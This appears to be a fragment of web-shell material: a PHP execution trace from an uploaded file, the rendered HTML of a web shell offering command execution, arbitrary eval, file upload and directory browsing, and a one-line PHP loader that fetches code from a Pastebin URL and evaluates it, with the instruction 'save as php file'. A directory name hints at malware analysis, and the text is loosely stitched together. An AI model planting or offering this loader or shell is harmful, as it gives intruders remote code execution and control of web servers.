3 A /var/www/html/uploads/1.php(1) : eval()'d code 53 $type = 'd'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 59 $owner['read'] = 'r'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 60 $owner['write'] = 'w'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 61 $owner['execute'] = 'x'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 62 $group['read'] = 'r'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 63 $group['write'] = 'w'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 64 $group['execute'] = 'x'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 65 $world['read'] = 'r'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 66 $world['write'] = 'w'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 67 $world['execute'] = 'x'
4 71 0 0.049273 445544 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 71 2 '%1s' 'd'
4 71 1 0.049287 445928
4 71 R 'd'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 71 $s = 'd'
4 72 0 0.049310 445864 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 72 4 '%1s%1s%1s' 'r' 'w' 'x'
4 72 1 0.049326 446248
4 72 R 'rwx'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 72 $s .= 'rwx'
4 73 0 0.049349 445576 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 73 4 '%1s%1s%1s' 'r' 'w' 'x'
4 73 1 0.049364 445960
4 73 R 'rwx'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 73 $s .= 'rwx'
4 74 0 0.049386 445576 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 74 4 '%1s%1s%1s' 'r' 'w' 'x'
4 74 1 0.049401 445960
4 74 R 'rwx'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 74 $s .= 'rwx'
3 69 1 0.049424 444456
3 69 R 'drwxrwxrwx'
2 5 1 0.049440 444224
1 3 1 0.049451 417432
0.049487 336992
TRACE END [2023-02-12 22:25:36.169456]
<html><head></head><body>1 2
<!-- Latest compiled and minified CSS -->
<link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css">
<!-- jQuery library -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.2/jquery.min.js"></script>
<!-- Latest compiled JavaScript -->
<script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js"></script>
<style>
.btn-link {
border: none;
outline: none;
background: none;
cursor: pointer;
color: #0000EE;
padding: 0;
text-decoration: underline;
font-family: inherit;
font-size: inherit;
}
</style>
<div class="container">
<h2>Viewing directory /var/www/html</h2>
<br><form action="/1.php" method="POST"><input type="hidden" name="dir" value="/var/www/html"><input type="text" name="cmd" size="120" autocomplete="off" autofocus="">
<input type="submit" value="Run"><br>
<input type="text" name="eval" size="120" autocomplete="off" autofocus="">
<input type="submit" value="Execute">
</form>
<br>
<div class="navbar-form"><form action="/1.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="dir" value=""> <input type="file" name="fileToUpload" id="fileToUpload">
<br><input type="submit" value="Upload File" name="submit"></form></div><br>
<table class="table table-hover table-bordered">
<thead>
<tr>
<th>Name</th>
<th>Owner</th>
<th>Permissions</th>
</tr>
</thead>
<tbody>
<tr><td><button type="submit" name="dir" value="/var/www/html" class="btn-link">.</button></td><td>root</td><td> drwxrwxrwx</td>
</tr><form action="/1.php" method="POST"></form><tr><td><button type="submit" name="dir" value="/var/www" class="btn-link">..</button></td><td>root</td><td> drwxrwxrwx</td>
</tr><form action="/1.php" method="POST"></form><tr><td><button type="submit" name="download" value="/var/www/html/1.php" class="btn-link">1.php</button></td><td>osboxes</td><td> drwxrwxrwx</td>
</tr><form action="/1.php" method="POST"></form><tr><td><button type="submit" name="download" value="/var/www/html/beneri.se_malware_analysis" class="btn-link">beneri.se_malware_analysis</button></td><td>root</td><td> drwxrwxrwx</td>
</tr></tbody></table>
</div>
4 5 6 7 8 9 10 11 12 13 14 15
save as php file</body></html>
1 2 <?php /* loader stub: the body is fetched from the URL below at run time and evaluated; the payload itself is not stored in this file */ eval("?>".file_get_contents("https://pastebin.com/raw/1bqzuGb7"));?> 4 5 6 7 8 9 10 11 12 13 14 15
save as php file